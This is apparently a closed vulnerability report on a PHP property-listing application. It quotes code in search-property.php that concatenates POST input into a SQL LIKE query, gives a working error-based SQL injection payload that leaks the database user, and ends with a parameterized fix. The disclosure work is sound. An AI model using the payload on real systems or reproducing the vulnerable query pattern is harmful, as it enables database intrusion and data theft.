Closed
Description
Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4
SQL injection vulnerability exists in search-property.php
In search-property.php, on lines 52-54 of the code, search_property is passed to the backend through the POST request and assigned to the variable $q_string, which is then substituted into the database statement for a fuzzy query, and the mysqli_query function returns the result of the query:
$q_string = $_POST['search_property'];
$sql="SELECT * FROM add_property where concat(zone,district,province,city,tole,property_type,country) like '%$q_string%'";
$query=mysqli_query($db,$sql);
POC:
123' or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ace
SQL injection to obtain the current user
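A parameterized form of the query on lines 52-54, as an added example that is not code from the project or from the reporter. The function names `escape_like` and `search_properties` are hypothetical, and `$db` is assumed to be the script's existing mysqli connection with the mysqlnd driver available.

```php
<?php
declare(strict_types=1);

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Escape LIKE metacharacters so the search term is matched literally.
 * '!' is used as the escape character (declared in the query below) so the
 * behaviour does not depend on the server's backslash-escape SQL mode.
 */
function escape_like(string $term): string
{
    return strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

/**
 * Hypothetical replacement for the concatenated query in search-property.php.
 * The search term is sent as a bound parameter, so quotes, comments and
 * subqueries in the input are data and never reach the SQL parser.
 */
function search_properties(mysqli $db, string $term): array
{
    $sql = "SELECT * FROM add_property
            WHERE CONCAT(zone,district,province,city,tole,property_type,country)
                  LIKE ? ESCAPE '!'";

    $pattern = '%' . escape_like($term) . '%';

    $stmt = $db->prepare($sql);
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // requires mysqlnd
    $stmt->close();

    return $rows;
}

// Usage in place of lines 52-54 (assumes $db is the existing connection):
// $q_string = $_POST['search_property'] ?? '';
// $rows = search_properties($db, is_string($q_string) ? $q_string : '');
```

With this form the POC string above is searched for as literal text and returns no rows instead of a database error carrying the result of user().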

